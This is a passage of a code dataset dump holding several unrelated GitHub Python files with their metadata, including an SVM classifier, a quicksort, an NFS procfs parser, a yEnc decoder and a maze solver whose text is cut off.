else:\n X, y, mapping, _ = split_data(data, normalise=True)\n # X_train, X_test, y_train, y_test = Xy\n\n cv = StratifiedKFold(n_splits=10, random_state=42, shuffle=False)\n i = 0\n for train_index, test_index in cv.split(X, y):\n X_train, X_test, y_train, y_test = X[train_index], X[test_index], y[train_index], y[test_index]\n\n logger.info(\"Support vector machine classifier -- initialised\")\n start_time = time.time()\n clf = svm.LinearSVC(verbose=2)\n clf.fit(X_train, y_train)\n svm_out = r\"{0}/{1}\".format(fp, i)\n make_dir(svm_out)\n y_pred = clf.predict(X_test)\n generate_classification_report(svm_out, method_name, y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n run_time = calculate_time(start_time)\n\n if save:\n save_metrics(svm_out, method_name, mapping, accuracy, run_time)\n save_model(clf, method_name, svm_out)\n i += 1\n\n\nif __name__ == '__main__':\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter(formatter)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file-location\", help=\"location to files.\", default=\"../Datasets/cleaned\")\n parser.add_argument(\"-o\", \"--out\", help=\"out folder path\", default=\"out/\")\n\n args = parser.parse_args()\n make_dir(args.out)\n\n original_dataset = read_files([args.file_location], clean_data=False) # todo remove hardcode\n\n original_dataset = sort_time(original_dataset)\n support_vector_machine_classifier(original_dataset, fp=args.out, save=True, time_series=False)\n # random_forest_classifier(original_dataset,fp=args.out, save=True, time_series=False)\n","repo_name":"SusmitaDumiRai/Dissertation","sub_path":"Implementation/classifiers/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":10089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74044528785","text":"N =int(input().strip())\n#last 2 digits of a ibonacci repeat after 300 digits\nN = N%300\n\ndef fibonacci(n):\n table = [0,1]\n for i in range(2,n+1):\n table.append(table[-1]+table[-2])\n return table[n]\n\na = fibonacci(N)\n# last_digit = a%10\n# second_last = (a//10)%10\n\n# print(second_last*10+last_digit)\nprint(a%100)","repo_name":"Harshit-Raj-2000/Algorithms-and-Data-Structures","sub_path":"coding interview practice/puzzles/last2digitsofibonaci.py","file_name":"last2digitsofibonaci.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4115679727","text":"from google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nimport bene_query\nimport bene_util\nimport os\nimport urllib\n\n\n\"\"\"\nConsumer home page\n\"\"\"\nclass ConsumerHomePage(webapp.RequestHandler):\n def get(self):\n user = users.get_current_user()\n if not user: # if not signed in\n self.redirect('/?signin=True')\n return\n if bene_query.getCurrentUser().isProducer: # producer can't get to consumer home page\n self.redirect('/')\n return\n \n _consumer = bene_query.getCurrentConsumer()\n if _consumer == None: # if consumer page doesn't exist, need to create one\n self.redirect('/createconsumer?%s' % urllib.urlencode({'redirect': 'consumerhome', 'msg': True}))\n return\n \n # if setup done, then show home page\n template_values = bene_util.initTemplate(self.request.uri)\n path = os.path.join(os.path.dirname(__file__), 'consumerhome.html')\n self.response.out.write(template.render(path, template_values))\n return\n \n '''\n Exception handler\n '''\n def handle_exception(self, exception, debug_mode):\n if debug_mode:\n super(ConsumerHomePage, self).handle_exception(exception, debug_mode)\n else:\n template_values = bene_util.initTemplate(self.request.uri)\n path = os.path.join(os.path.dirname(__file__), 'not_found.html')\n self.response.out.write(template.render(path, template_values))\n return\n \n ","repo_name":"faaez/BeneTag","sub_path":"consumer_home.py","file_name":"consumer_home.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"12057944992","text":"arr = [ 0, 1, 3 , 2 , 6 , 9 , 4]\n\ndef part(arr , l , h):\n i = l - 1 \n pivot = arr[h]\n \n for j in range(l , h):\n if(arr[j] <= pivot):\n i+=1\n arr[i] , arr[j] = arr[j] , arr[i]\n \n arr[i+1] , arr[h] = arr[h],arr[i+1]\n return (i+1)\n \n \ndef quick(arr , l , h):\n if len(arr) < 2:\n return\n if( l < h ):\n pi = part(arr , l , h)\n quick(arr , l , pi - 1)\n quick(arr , pi + 1 , h)\n return arr\n\nprint(quick(arr))\n","repo_name":"nir099/KnowledgeBase","sub_path":"Algo/Sort/Quick/quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"26372556722","text":"#Mulitply of elements\n\nlst = []\n\nn = int(input(\"Enter number of elements : \"))\nfor i in range(0, n):\n ele = int(input())\n lst.append(ele)\nprint(\"--------LIST IS---------------\")\nprint(lst)\nprint(\"--------------------------------\")\n\nprint(\"-----------********---------------------\")\n\n\ndef multiplyList(lst):\n # Multiply elements one by one\n result = 1\n for x in lst:\n result = result * x\n return result\n\ntotalmult = multiplyList(lst);\nprint('multiplication of elements using function: ', totalmult)\nprint(\"--------------------------------\")\nprint(\"-----------********---------------------\")\n\nclass Multiply_Ele:\n def _init_(self,Multi):\n self.lst = Multi\n def pro_ele(self):\n pro = 1\n for n in lst:\n pro = pro*n\n print(\"Multiply of elements given a list using oops concept:\",pro)\n\nm = Multiply_Ele()\nm.pro_ele()\nprint(\"-----------********---------------------\")","repo_name":"Rakeshkumarlenka/test_functions","sub_path":"DECEMBER/LIST/Q2.Mulitply .py","file_name":"Q2.Mulitply .py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29829276665","text":"import appscript\nfrom datetime import datetime\n\ndef add_to_calendar(title, details, start_time, end_time, calendar_name):\n # Convert start_time and end_time to datetime objects\n start_time = datetime.strptime(start_time, '%Y-%m-%d %H:%M')\n end_time = datetime.strptime(end_time, '%Y-%m-%d %H:%M')\n\n # Create a new event in the specified calendar\n appscript.app(\"Calendar\").calendars[calendar_name].events.end.make(\n new=appscript.k.event, \n with_properties={\n appscript.k.summary: title,\n appscript.k.description: details,\n appscript.k.start_date: start_time,\n appscript.k.end_date: end_time\n }\n )\n\nif __name__ == \"__main__\":\n # Import the k and app objects from appscript\n # [appscript documentation](https://appscript.readthedocs.io/en/latest/)\n # [k object documentation](https://appscript.readthedocs.io/en/latest/terminology/k.html)\n # [app function documentation](https://appscript.readthedocs.io/en/latest/terminology/app.html)\n k = appscript.k\n app = appscript.app\n \n # Set the base date for the itinerary\n base_date = \"2023-09-10\"\n \n # List of events in the itinerary\n events = [\n (\"Arrival at California Adventure\", \"Begin your magical journey.\", \"15:30\", \"16:00\"),\n (\"Option A: Musical Celebration of Coco OR Option B: Dr. Strange: Mysteries of the Mystic Arts\", \"Attend the chosen show.\", \"16:00\", \"16:30\"),\n (\"Avengers Assemble!\", \"Join the Avengers.\", \"16:40\", \"17:10\"),\n (\"Meet Baymax in San Fransokyo Square\", \"Meet and greet session with Baymax.\", \"17:10\", \"17:30\"),\n (\"Option A: Explore and Eat OR Option B: Guardians of the Galaxy: Awesome Dance Off!\", \"Choose one activity.\", \"17:30\", \"18:00\"),\n (\"Mickey's Trick and Treat at Oogie Boogie Bash\", \"Attend the treat session.\", \"18:00\", \"18:30\"),\n (\"Transition to Disneyland for Parade\", \"Head to Disneyland for the parade.\", \"18:30\", \"19:00\"),\n (\"Magic Happens Parade\", \"Enjoy the parade.\", \"19:00\", \"20:00\"),\n (\"Visit to Mickey's Toontown\", \"Explore the magical town.\", \"20:00\", \"20:30\"),\n (\"Mickey & Minnie's Runaway Railway\", \"Experience the ride.\", \"20:30\", \"21:00\"),\n ]\n \n # Add each event to the calendar\n for event in events:\n title, details, start, end = event\n start_time = f\"{base_date} {start}\"\n end_time = f\"{base_date} {end}\"\n \n # Add the event to the \"Thomas Family\" calendar\n add_to_calendar(title, details, start_time, end_time, \"Thomas Family\")\n","repo_name":"thinkingserious/apple-calendar","sub_path":"trip.py","file_name":"trip.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7621949467","text":"#LAURA MAMBRILLA MORENO\n#EJ 3 CUADERNO 3\n\n\"\"\"\nEscribe un programa que lea la hora en notación de 24 horas y la devuelva en\nnotación de 12 horas (ejemplo: las 18:30 serán las 6:30 PM). Valida las entradas\npara asegurarte de que se trata de valores en el rango correcto.\n\n\"\"\"\n\ndef validar_entrada_hora ():\n \"\"\"\n OBJ: validar entrada y marcar rango para el formato hora\n \"\"\"\n hora=-1 #para que la hora entre en el bucle\n while hora<0:\n try:\n hora= int(input('Hora: '))\n except ValueError:\n print ('Dato incompatible. Introduzca otra hora: ')\n if hora>0 or hora<23:\n return hora\n return 'Fuera del rango del formato \"horas\"'\n\ndef validar_entrada_minutos ():\n \"\"\"\n OBJ: validar entrada y marcar rango para el formato hora\n \"\"\"\n minutos=-1\n while minutos<0:\n try:\n minutos= int(input('Minutos: '))\n except ValueError:\n print ('Dato incompatible. Introduzca otros minutos: ')\n if minutos>0 or minutos<23:\n return minutos\n return 'Fuera del rango del formato \"horas\"'\n\ndef cambio_hora(hora):\n \"\"\"\n int, int --> int\n OBJ: pasar de formato AM a PM\n \"\"\"\n if hora>12:\n hora_pm = hora - 12\n if minutos<10:\n print (hora_pm,': 0',minutos,' PM')\n else:\n print (hora_pm,':',minutos,' PM')\n else:\n if minutos<10:\n print (hora,': 0',minutos,' AM')\n else:\n print (hora,':',minutos,' AM')\n \n\n#MAIN\n\nprint ('Introduzca una hora')\nhora= validar_entrada_hora()\nminutos= validar_entrada_minutos()\n\ncambio_hora(hora)\n \n","repo_name":"lauram15a/Fundamentos_de_programacion","sub_path":"CUADERNOS DE TRABAJO/CUADERNO 3/ej 3 cuaderno 3 horas y minutos.py","file_name":"ej 3 cuaderno 3 horas y minutos.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13462133140","text":"## install these packages before running\n# !pip install -U spacy\n# !python -m spacy download en_core_web_sm\n\nimport pandas as pd\nimport re\nimport unicodedata\nimport nltk\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize.toktok import ToktokTokenizer\nfrom nltk.corpus import stopwords\nimport spacy\n\n\ndef basic_clean_keep_code(string):\n '''\n Takes in a string, makes all characters lowercase, normalizes all characters, and removes unnnecessary special characters\n import re\n import unicodedata\n '''\n # Remove line breaks\n string = re.sub(r'\\n', ' ', string)\n \n # Remove the urls\n string = re.sub(r'https?://[^\\s]+', '', string)\n \n # lowercase all words\n lowered = string.lower()\n\n # normalize unicode characters using lowered\n normalized = unicodedata.normalize('NFKD', lowered).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n \n # replacing unnecessary characters from normalized\n cleaned = re.sub(r\"[^a-z0-9'\\s]\", '', normalized)\n \n return cleaned\n\ndef tokenize(string):\n '''\n Takes in a string and tokenizes the string\n Modules:\n from nltk.tokenize.toktok import ToktokTokenizer\n '''\n # initialize tokenizers\n tokenizer = nltk.tokenize.ToktokTokenizer()\n \n # tokenize string and store in tokenized\n tokenized = tokenizer.tokenize(string, return_str=True)\n \n return tokenized\n\n\ndef remove_stopwords(string, extra_words=[], exclude_words=[]):\n '''\n takes in a string and removes stopwords using the stopwords\n Modules:\n from nltk.corpus import stopwords\n '''\n # establish stop word list\n stop_word_list = stopwords.words('english')\n \n # if there are any words in the kwarg\n if bool(extra_words) == True:\n\n # add them to the stop_word_list\n stop_word_list = stop_word_list + extra_words\n\n # if there are any words in the kwarg\n if bool(exclude_words) == True:\n\n # remove them from the stop word list\n stop_word_list = [word for word in stop_word_list if word not in exclude_words]\n \n # getting a list of words from string argument that are not in the list of stop words (removing the stopwords)\n filtered = [word for word in string.split() if word not in stop_word_list]\n \n # rejoin all the words in the lsit with a space to reform string\n string_without_stopwords = ' '.join(filtered)\n \n # exit and return the string\n return string_without_stopwords\n\ndef cleaned_with_code_included(x):\n '''\n Takes in a string literal and performs cleaning, tokenizing, and removes the stop words\n \n '''\n # runs a basic clean\n x = basic_clean_keep_code(x)\n \n # tokenizes the words\n x = tokenize(x)\n \n # removes the stop words\n x = remove_stopwords(x)\n \n # returns string with all cleaning steps performed\n return x\n\ndef lemmatize(string):\n '''\n Takes in a string and returns it with all words in lemmatized form\n Modules:\n import nltk\n '''\n # initializing lematizing object\n wnl = nltk.stem.WordNetLemmatizer()\n\n # getting a list of root words from each word in the split string\n lemmas = [wnl.lemmatize(word) for word in string.split()]\n\n # rejoining the list of root words to form a lemmatized corpus\n lemmatized = ' '.join(lemmas)\n \n # exit and return lemmatized info\n return lemmatized\n\ndef spacy_string(string):\n '''\n Takes in a string and returns it with all words in spacy-lemmatization form form\n Modules:\n import spacy\n '''\n # initializing lematizing object\n nlp = spacy.load('en_core_web_sm')\n \n # getting lemmatized words\n string_stemmed = [word.lemma_ for word in nlp(string)]\n \n # rejoining words\n string_stemmed = ' '.join(string_stemmed)\n \n # exit and return lemmatized info\n return string_stemmed\n\ndef basic_prepare(df):\n '''\n Takes in a df and adds columns with cleaned code\n '''\n df.dropna(inplace=True)\n # initial cleaning completed\n df['basic_clean_with_code'] = df['readme_contents'].apply(lambda x: cleaned_with_code_included(x))\n \n # getting spacy stemming\n df['spacy'] = df['basic_clean_with_code'].apply(lambda x: spacy_string(x))\n \n # getting lemmatized text\n df['lem'] = df['basic_clean_with_code'].apply(lambda x: lemmatize(x))\n \n return df\n","repo_name":"garcia-moore/nlp-readme-project","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37706505815","text":"from procfs.core import ProcessFile, Dict\n\n\n# /proc/net/rpc/nfsd documentation:\n# /fs/nfsd/stats.c : nfsd_proc_show\n# /net/sunrpc/stats.c : svc_seq_show\n# /fs/nfsd/nfsproc.c : nfsd_procedures2\n# /fs/nfsd/nfs3proc.c : nfsd_procedures3\n# /fs/nfsd/nfs4proc.c : nfsd_procedures4 nfsd4_ops\n# http://marc.info/?l=linux-nfs&m=119308862812388&w=1\n# http://article.gmane.org/gmane.linux.nfs/16594\nclass _BaseNfs(ProcessFile):\n \"\"\"Base class for parsing /proc/net/rpc/nfs and /proc/net/rpc/nfsd\n \"\"\"\n\n def _parse(self, data):\n lines = data.splitlines()\n result = Dict()\n for line in lines:\n str_values = line.split()\n type_ = str_values.pop(0)\n values = []\n for value in str_values:\n if '.' in value:\n parser = float\n else:\n parser = int\n values.append(parser(value))\n parser_name = '_parse_%s' % type_\n if hasattr(self, parser_name):\n parser = getattr(self, parser_name)\n values = parser(*values)\n result[type_] = values\n return result\n\n def _parse_net(self, netcnt, netudpcnt, nettcpcnt, nettcpconn):\n return Dict(netcnt=netcnt, netudpcnt=netudpcnt,\n nettcpcnt=nettcpcnt, nettcpconn=nettcpconn)\n\n def _parse_proc2(self, cnt, null, getattr, setattr, root, lookup,\n readlink, read, writecache, write, create, remove,\n rename, link, symlink, mkdir, rmdir, readdir, statfs):\n return Dict(null=null, getattr=getattr, setattr=setattr,\n root=root, lookup=lookup, readlink=readlink,\n read=read, writecache=writecache, write=write,\n create=create, remove=remove, rename=rename,\n link=link, symlink=symlink, mkdir=mkdir,\n rmdir=rmdir, readdir=readdir, statfs=statfs)\n\n def _parse_proc3(self, cnt, null, getattr, setattr, lookup, access,\n readlink, read, write, create, mkdir, symlink, mknod,\n remove, rmdir, rename, link, readdir, readdirplus,\n fsstat, fsinfo, pathconf, commit):\n return Dict(null=null, getattr=getattr, setattr=setattr,\n lookup=lookup, access=access, readlink=readlink,\n read=read, write=write, create=create, mkdir=mkdir,\n symlink=symlink, mknod=mknod, remove=remove,\n rmdir=rmdir, rename=rename, link=link,\n readdir=readdir, readdirplus=readdirplus,\n fsstat=fsstat, fsinfo=fsinfo, pathconf=pathconf,\n commit=commit)\n\n\nclass nfsd(_BaseNfs):\n \"\"\"/proc/net/rpc/nfsd\n \"\"\"\n\n def _parse_rc(self, hits, misses, nocache):\n return Dict(hits=hits, misses=misses, nocache=nocache)\n\n def _parse_fh(self, stale, total_lookups, anonlookups, dir_not_in_cache,\n nondir_not_in_cache):\n return Dict(stale=stale, total_lookups=total_lookups,\n anonlookups=anonlookups,\n dir_not_in_cache=dir_not_in_cache,\n nondir_not_in_cache=nondir_not_in_cache)\n\n def _parse_io(self, read, written):\n return Dict(read=read, written=written)\n\n def _parse_th(self, threads, fullcnt, *busy_times):\n busy = {'10-20': busy_times[0],\n '20-30': busy_times[1],\n '30-40': busy_times[2],\n '40-50': busy_times[3],\n '50-60': busy_times[4],\n '60-70': busy_times[5],\n '70-80': busy_times[6],\n '80-90': busy_times[7],\n '90-100': busy_times[8]}\n return Dict(threads=threads, fullcnt=fullcnt, busy=busy)\n\n def _parse_rpc(self, cnt, badcnt, badfmt, badauth, badclnt):\n \"\"\"See /net/sunrpc/stats.c : svc_seq_show\n \"\"\"\n return Dict(cnt=cnt, badcnt=badcnt,\n badfmt=badfmt, badauth=badauth,\n badclnt=badclnt)\n\n def _parse_ra(self, cache_size, *depths):\n not_found = depths[-1]\n depth = {10: depths[0], 20: depths[1], 30: depths[2], 40: depths[3],\n 50: depths[4], 60: depths[5], 70: depths[6], 80: depths[7],\n 90: depths[8], 100: depths[9]}\n return Dict(cache_size=cache_size, depth=depth, not_found=not_found)\n\n def _parse_proc4(self, cnt, null, compound):\n return Dict(null=null, compound=compound)\n\n# def _parse_proc4ops(self, cnt, access, close, commit, create, delegreturn,\n# getattr, getfh, link, lock, lockt, locku, lookup,\n# lookupp, nverify, open, open_confirm, open_downgrade,\n# putfh, putpubfh, putrootfh, read, readdir, readlink,\n# remove, rename, renew, restorefh, savefh, secinfo,\n# setattr, setclientid, setclientid_confirm, verify,\n# write, release_lockowner, exchange_id, create_session,\n# destroy_session, sequence):\n# return Dict(access=access, close=close, commit=commit,\n# create=create, delegreturn=delegreturn,\n# getattr=getattr, getfh=getfh, link=link, lock=lock,\n# lockt=lockt, locku=locku, lookup=lookup,\n# lookupp=lookupp, nverify=nverify, open=open,\n# open_confirm=open_confirm,\n# open_downgrade=open_downgrade, putfh=putfh,\n# putpubfh=putpubfh, putrootfh=putrootfh, read=read,\n# readdir=readdir, readlink=readlink, remove=remove,\n# rename=rename, renew=renew, restorefh=restorefh,\n# savefh=savefh, secinfo=secinfo, setattr=setattr,\n# setclientid=setclientid,\n# setclientid_confirm=setclientid_confirm,\n# verify=verify, write=write,\n# release_lockowner=release_lockowner,\n# exchange_id=exchange_id,\n# create_session=create_session,\n# destroy_session=destroy_session, sequence=sequence)\n\n\nclass nfs(_BaseNfs):\n \"\"\"/proc/net/rpc/nfs\n \"\"\"\n\n def _parse_rpc(self, cnt, retrans, authrefresh):\n \"\"\"See /net/sunrpc/stats.c : rpc_proc_show\n \"\"\"\n return Dict(cnt=cnt, retrans=retrans, authrefresh=authrefresh)\n","repo_name":"pmuller/procfs","sub_path":"procfs/processes/net/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"48"} +{"seq_id":"72324451027","text":"from shorthand import bitmask\nfrom contextlib import ExitStack, closing\nfrom shorthand import ceildiv\nfrom coropipe import PipeWriter\nimport re\nfrom io import BufferedIOBase\nfrom log import Progress\nfrom warnings import warn\n\nclass FileDecoder:\n def __init__(self, log, pipe):\n self.log = log\n self.pipe = pipe\n \n def parse_header(self):\n header = dict()\n # TODO: skip data until $=ybegin>; limit skipped data to say 1000 B\n # TODO flexible ordering; handle omission; flexible space; ignore lines\n # TODO: handle extra parameters\n # TODO: possibility to emit notices about unhandled parameters\n try:\n while True:\n stripped = self.pipe.buffer.lstrip(b\"\\r\\n\")\n if stripped:\n break\n self.pipe.buffer = yield\n self.pipe.buffer = stripped\n \n yield from self.pipe.expect(b\"=ybegin part=\")\n except EOFError:\n return None\n [header[\"part\"], _] = yield from self.pipe.read_delimited(b\" \",\n self.PART_DIGITS)\n header[\"part\"] = int(header[\"part\"]) - 1\n if (yield from self.pipe.consume_match(b\"total=\")):\n [header[\"total\"], _] = yield from self.pipe.read_delimited(\n b\" \", self.PART_DIGITS)\n header[\"total\"] = int(header[\"total\"])\n yield from self.pipe.consume_match(b\"line=128 \")\n yield from self.pipe.expect(b\"size=\")\n [header[\"size\"], _] = yield from self.pipe.read_delimited(b\" \",\n self.SIZE_DIGITS)\n header[\"size\"] = int(header[\"size\"])\n yield from self.pipe.consume_match(b\"line=128 \")\n \n yield from self.pipe.expect(b\"name=\")\n [header[\"name\"], _] = yield from self.pipe.read_delimited(b\"\\n\",\n self.NAME_CHARS)\n header[\"name\"] = header[\"name\"].rstrip()\n if (header[\"name\"].startswith(b'\"') and\n header[\"name\"].endswith(b'\"') and header[\"name\"] != b'\"'):\n header[\"name\"] = header[\"name\"][1:-1]\n header[\"name\"] = header[\"name\"].decode(\"ascii\")\n \n if (yield from self.pipe.consume_match(b\"=ypart begin=\")):\n [header[\"begin\"], _] = yield from self.pipe.read_delimited(b\" \",\n self.SIZE_DIGITS)\n header[\"begin\"] = int(header[\"begin\"]) - 1\n yield from self.pipe.expect(b\"end=\")\n [header[\"end\"], _] = yield from self.pipe.read_delimited(b\"\\n\",\n self.SIZE_DIGITS)\n header[\"end\"] = int(header[\"end\"])\n # TODO: make sure part size is not ridiculously huge\n return header\n \n def validate_header(self, header, chunking):\n # todo update params and compare\n \n size = header.get(\"size\")\n total = header.get(\"total\")\n if (size is not None and total is not None and\n ceildiv(size, chunking) != total):\n raise ValueError(header)\n \n [number, remainder] = divmod(header[\"begin\"], chunking)\n # TODO: compare number with part\n if total is not None and number >= total or remainder:\n raise ValueError(header[\"begin\"])\n if total is None:\n # TODO: part size <= chunking\n pass\n else:\n if number == total - 1:\n expected = size\n else:\n expected = header[\"begin\"] + chunking\n if expected not in (header[\"end\"], None):\n raise ValueError(header[\"end\"])\n \n def decode_part(self, file, header):\n # TODO: limit decoded data to (end - begin), or size if not partial, or some hard-coded limit if no size given\n file.seek(header[\"begin\"])\n # TODO: do not allow =y lines, newlines, etc to exceed data bytes by say 100\n progress = Progress(self.log, header[\"size\"], header[\"begin\"])\n with closing(StreamDecoder(UnclosingWriter(file))) as decoder:\n while True:\n data = self.pipe.buffer\n keywords = self.KEYWORD_LINE.search(data)\n if keywords:\n data = data[:keywords.start()]\n else:\n escape = self.HALF_ESCAPE.search(data)\n if escape:\n data = data[:escape.start()]\n decoder.feed(data)\n decoder.flush()\n if keywords:\n # TODO: ignore any unknown =y... lines\n self.pipe.buffer = self.pipe.buffer[keywords.end():]\n break\n if escape:\n while True:\n self.pipe.buffer = (yield).lstrip(b\"\\r\\n\")\n if self.pipe.buffer:\n break\n if self.pipe.buffer.startswith(b\"y\"):\n self.pipe.buffer = self.pipe.buffer[1:]\n break\n else:\n self.pipe.buffer = yield\n progress.update(file.tell())\n # TODO: incorporate into total of all files; update total of all files with real file size\n # TODO: keep samples over multiple parts\n if file.tell() != header[\"end\"]:\n raise ValueError(header[\"end\"])\n \n expected = \"end size={} part={} pcrc32=\"\n size = header[\"end\"] - header[\"begin\"]\n expected = expected.format(size, 1 + header[\"part\"])\n yield from self.pipe.expect(expected.encode(\"ascii\"))\n crc = decoder.getCrc32()\n [stated, delim] = yield from self.pipe.read_delimited(b\" \\r\\n\", 8)\n if int(stated, 16) != int(crc, 16):\n msg = \"Calculated part CRC {} != stated pcrc32={}\"\n raise ValueError(msg.format(crc, stated))\n \n if delim != b\"\\n\":\n yield from self.pipe.read_delimited(b\"\\n\", 30)\n \n # TODO: explicitly detect second yEnc object and report as error,\n # since this is specifically allowed\n \n PART_DIGITS = 10 # yEnc1-formal1.txt (2002) maximum is 999 (3 digits)\n SIZE_DIGITS = 30 # yEnc1-formal1.txt maximum is 2^62 - 1 (19 digits)\n NAME_CHARS = 1000 # yenc-draft.1.3.txt (2002) maximum is 256 characters\n \n KEYWORD_LINE = re.compile(br\"=[\\r\\n]*y\")\n HALF_ESCAPE = re.compile(br\"=[\\r\\n]*$\")\n\ntry:\n from yenc import Decoder as StreamDecoder\nexcept ImportError:\n from binascii import crc32\n \n class StreamDecoder:\n def __init__(self, file):\n self._file = file\n self._crc = 0\n self._pipe = PipeWriter()\n self._cleanup = ExitStack()\n coroutine = self._pipe.coroutine(self._receive())\n self._cleanup.enter_context(coroutine)\n \n def close(self):\n self._pipe.close()\n del self._pipe\n self._cleanup.close()\n \n def feed(self, data):\n self._pipe.write(data)\n \n def _receive(self):\n while True:\n data = self._pipe.buffer\n pos = data.find(b\"=\")\n if pos >= 0:\n data = data[:pos]\n data = data.replace(b\"\\r\", b\"\").replace(b\"\\n\", b\"\")\n data = data.translate(self.TABLE)\n # TODO: check data size overflow\n self._crc = crc32(data, self._crc)\n self._file.write(data)\n if pos >= 0: # Escape character (equals sign)\n self._pipe.buffer = self._pipe.buffer[pos + 1:]\n while True:\n byte = yield from self._pipe.read_one()\n if byte not in b\"\\r\\n\":\n break\n # TODO: check for size overflow\n [byte] = byte\n data = bytes(((byte - 64 - 42) & bitmask(8),))\n self._crc = crc32(data, self._crc)\n self._file.write(data)\n else:\n try:\n self._pipe.buffer = yield\n except EOFError:\n break\n \n def flush(self):\n pass\n \n def getCrc32(self):\n return format(self._crc, \"08x\")\n \n TABLE = bytes(range(256))\n TABLE = TABLE[-42:] + TABLE[:-42]\n\nclass UnclosingWriter(BufferedIOBase):\n def __init__(self, writer):\n self.writer = writer\n def write(self, *pos, **kw):\n return self.writer.write(*pos, **kw)\n","repo_name":"vadmium/usenet-downloader","sub_path":"yencread.py","file_name":"yencread.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"25329003582","text":"#Funcion que no regresa nada solo imprime\ndef decirHola(nombre=\"\"):\n print('Hola {0}'.format(nombre))\ndecirHola('Andres')\ndecirHola()\n\n#Funcion que me regresa un valor\ndef hacerSuma(num1,num2):\n total = num1 + num2\n return 'El resultado es: '+ str(total)+' '+ str( type(total)) \n\nnum1=input('Escribe numero 1: ')\nnum2=input('Escribe numero 2: ')\n\nprint(hacerSuma(num1,num2))\n\n#total= hacerSuma(2,3)\n","repo_name":"jorgeortiz123/CodigoPythonML","sub_path":"CodigoDePractica/CodigoPython/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44965355295","text":"#!/usr/bin/python\n\n# -*- coding: UTF-8 -*-\n\n\nimport paramiko\n\nfrom eve import app\n\nDEFAULT_USERNAME = app.config['DEFAULT_USER']\nDEFAULT_KEY_FILE = app.config['RSA_FILE']\n\n\ndef trans_data(hostname,\n key_file=DEFAULT_KEY_FILE,\n remote_path=None,\n local_path=None,\n port=22,\n username=DEFAULT_USERNAME ):\n\n with paramiko.Transport(hostname, port) as t:\n key = paramiko.RSAKey.from_private_key_file(key_file)\n t.connect(username=username, pkey=key)\n sftp = paramiko.SFTPClient.from_transport(t)\n sftp.put(localpath=local_path, remotepath=remote_path)\n\n\n\n\n\n\n\ndef command_with_result(hostname, command, key_file=DEFAULT_KEY_FILE, username=DEFAULT_USERNAME, port=22):\n with paramiko.SSHClient() as ssh:\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(hostname, port, username, key_filename=key_file)\n stdin, stdout, stderr = ssh.exec_command(command)\n return ''.join(stdout.readlines()), ''.join(stderr.readlines())\n\n\ndef escape_shell_arg(arg):\n return \"\\\\'\".join(\"'\" + p + \"'\" for p in arg.split(\"'\"))\n","repo_name":"youpengfei/eve","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20287642303","text":"from torch.utils.tensorboard import SummaryWriter\n\n\ndef episode(env, agent):\n writer = SummaryWriter()\n\n num_episodes = 1000\n for i in range(num_episodes):\n state = env.reset()\n total_reward = 0\n while True:\n env.render()\n action = agent.step()\n next_state, reward, done, info = env.step(action)\n total_reward += reward\n state = next_state\n\n if done:\n break\n\n writer.add_scalar('reward', total_reward, global_step=i)\n\n\nclass RandomAgent:\n def __init__(self, action_space, observation_space):\n self.action_space = action_space\n self.observation_space = observation_space\n self.num_actions = action_space.n\n\n def step(self):\n return self.action_space.sample()\n","repo_name":"andrijazz/learn","sub_path":"rl_ua/code/lunar_lander/random_agent.py","file_name":"random_agent.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27783370267","text":"import pygame\nimport huntandkill\nimport growingtree\nimport binarytree\nimport grid\nimport solver\nimport window\n\n# Screen and grid constants\nWIDTH = 800\nROWS = 10\nCOLS = ROWS\n\nYELLOW = (255, 255, 0)\n\n## Main\ndef main():\n surface = window.init_surface(WIDTH)\n g = grid.Grid(ROWS, COLS, WIDTH)\n\n start = None\n end = None\n\n running = True\n while running:\n window.draw(surface, g.grid)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Check left mouse button\n if pygame.mouse.get_pressed()[0]:\n pos = pygame.mouse.get_pos()\n row, col = window.get_clicked_pos(pos, WIDTH, ROWS)\n cell = g.grid[row][col]\n\n if not start and cell != end:\n start 